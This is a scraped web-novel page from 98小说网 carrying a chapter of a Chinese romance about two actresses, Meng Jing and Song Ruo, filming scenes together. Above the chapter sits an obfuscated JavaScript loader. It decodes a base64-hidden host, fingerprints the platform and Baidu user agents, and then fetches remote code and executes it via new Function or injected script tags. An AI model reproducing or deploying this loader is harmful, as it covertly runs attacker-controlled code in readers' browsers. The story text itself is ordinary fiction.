98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(48(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

老婆喂。孟璟语气嗲嗲的,张开了血盆大口。

第59章

从餐厅回酒店,孟璟躺在床上,怀里抱着个枕头,默默看着天花板,脸上一抹神秘的微笑。未婚妻还是很爱她的。

那些据理力争,那句你照顾好你的宝贝,我照顾好我的,她只恨没能拿录音笔给录下来。小药瓶子这么一搅和,冲淡了她和苏女士相见的种种不愉快。她抱着枕头在床上翻了两个滚。假如这些还是工作,那后来她要求未婚妻喂食,她大可以拒绝的,可宋若只迟疑了一小会儿,就很温柔地喂她,那种细致体贴的态度,没有爱是不可能办到的。

今天的糖分已经超标了。更何况明天还有船戏。

嗷嗷嗷嗷

对面。宋若在洗漱台用温水洗脸,洗到一半顿住,抬头往镜子里望了望,有些懊恼。

抹香鲸有毒。

一小时前,在饭店,起先她原本是坚决不喂鲸鱼。

可孟璟依然努力大张着嘴,露着她粉嫩的小舌头,啊

餐厅没包厢,隔间也不存在,两个人从到那儿起,就已经受了诸多注目礼,随着时间的推移,对她们感到兴趣的人数有增无减。孟璟自我惯了,不觉得有什么,不在意那些目光。而她除了工作而外,却更喜欢低调自在的生活,当众喂食什么的,过于羞耻了。因此轻轻提醒她你有手有脚的。

是啊。我本来觉得自己还好,都怪老婆,演说太精彩了,我现在觉得自己好惨啊,孟璟两手搭在膝上,我可只有你了。啊

也许是为了快点离开那个地方回来休息,最终她还是屈服了,拿叉子喂鲸鱼。

怪就怪在,她竟然感觉还不错。喂了会儿鲸,就跟撸了猫一样,心情变得很愉悦。

宋若皱着眉,将水龙头拧到最凉那一档,连洗了好半天冷水,总算清醒了一点。

次日傍晚,拍摄现场。

接连两次ng之后,倪俊抓着孟璟训话怎么一回事,白天明明进入状态很快。晚上怎么了?

孟璟心想,白天是和其他演员的对手戏,晚上是和未婚妻的。这怎么能一样。

主要问题在,她现在心情甘美,这段戏却是有点虐。

见到未婚妻,她就控制不住流露出甜蜜的表情。

倪俊现在也比较会拿捏她的要害了,指指宋若看到没,你表情不对,宋若就得一直陪你重来。

这话果然一下子就戳中了孟璟,她整理了下表情。

倪俊点点头,继续说你现在很痛苦,你舍不得景知安,但理智和自尊告诉你,你必须得放开她。可是你不坚定,你贪恋,贪恋她的温柔,也贪恋她带给你的安定的感觉,所以你

纠结。孟璟接口,面容已然十分肃穆。

倪俊打个响指准备就位。

两个人由屋外回到屋内,换了衣服,头发却还湿漉漉的。郑遂心坐在天鹅绒沙发里,景知安站在她面前,拿一块纯白的大毛巾裹住了她,替她擦头发,郑遂心仰着头,无限依恋地看着她,眼圈通红。头发擦至半干,景知安又去开炉子,烧了热水,倒了一杯让郑遂心捧着,再拿过不锈钢质地的电吹风。烧水时,整个空间只有水开之前的轰鸣,现在又只有电吹风的嗡嗡声。她和她是那样的默契,甚至不需要任何言语交流。

她们在黑暗里相拥而卧,像两只疲倦至极的小小困兽。

以往总是风光旖旎的午夜时分,今夜显得寂灭得过分。

景知安靠着她,脸蹭进她怀里。走到这一步,无论接下来是就此告别还是和好如初,都不该这样无言地躺着,郑遂心不能告诉女朋友自己废了条胳膊,只能别开脸,仿佛并没有懂得她的祈求。

黑暗中静默延续了好一会儿,景知安忽然翻身骑上了她的腰。

这片的床戏走含蓄风。她们栖息的地方临窗,银纱一样的光透过薄薄的窗帘透进来,以这样柔润的光亮作为背景,俩人的动作像是一出影子戏,肢体相碰暧昧不已,却又只是剪影,不至于露骨,留给人浮想联翩的空间。郑遂心是披肩短发,景知安则是长发及腰。亲热戏点到即止,先前进攻方总是郑遂心,处在上位的人是短发,今天的影子戏里,在上方的那一位长发飞扬侧脸线条在光幕般的背景里格外明晰她头一次这样反攻她。

导演喊卡之后,宋若松一口气,想爬起来,一个不提防却被抹香鲸拉回去,脸再次匍匐在她颈窝。

抹香鲸含羞带怯的声音脑婆,要对我负责啊。

宋若捂住胸口,闭了闭眼睛。大鲸鱼真的有毒。

半晌,她端着水坐在那里镇定心神,副导演过来找她打个招呼,若若,接下来你还有一段是要到国外实地拍摄,顺利的话前后不用半个月,先前倪导和你商量过,你有数的吧?赶明儿这几场诀别戏走完,加上重逢戏,也没几场,在咱们小横店的戏就要拍完了,你有个心理准备。又对孟璟说小孟总的戏都是在国内哈。

孟璟揉揉鼻子,唔了一声。然而她要想跟老婆一起去,不要太容易。

回酒店的路上孟璟一直朝自己这边望着。宋若先是装作没看见,直忍到房间门口,实在忍不住了,你干嘛,一直用那种让人不爽的微笑看我。

孟璟一脸云淡风轻的笑意我都听到了。

宋若听到什么?

扑通扑通。孟璟跟个替人洗脑的神棍一样,一副成竹在胸的模样,跳得好快啊。啧啧。不等小药瓶有机会否认,直接切到下一个话题,未婚妻,你说的杀青之后,我可不可以建议,就在我杀青之后呀,我的处女作,需要老婆一个鼓励。你欠着我一场约会,远赴重洋,跟跑路似的,我这人心眼儿小,只怕得追着去。说完,补一个纯天然无公害的浅笑。

宋若靠着门想了想,要真去了外边,欠着债,确实有够挂心的,更重要的是,千万不能让孟璟再跟着过去。前些天季铭的戏杀青,他误打误撞喝了点酒,半路拦着她吐槽,说他进这组还是冲着两个人上部戏的合作,谁知到了这里,那位小孟总将若若看得这样紧,连找你聊天都没机会。半是真实半是玩笑的醉话,现在想起来,不啻给她当头一棒。她和抹香鲸实在粘得厉害,都要变成彼此的连体婴了,纵使孟璟有别的剧情要走,又哪里有机会?

这个国外实地拍摄来得正巧,刚好大家可以借机冷静一下。

好啊。宋若答应。

孟璟回到自己房间,仰倒在床上,脑海里不由自主又浮现刚刚的拍摄片段,虽说是借位居多,可也是正儿八经抱在一起睡觉觉。未婚妻那快得失去正常节奏的心跳,简直就是世界上最华美的乐章。

她捂着小心口翻滚不已时,手机冷不丁响起来。

倪羽晴发来视频。

孟璟心想竟然这么凑巧。刚说要扣她奖金,就来了。

晴姐。她戏谑地跟着苏助理称呼她。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间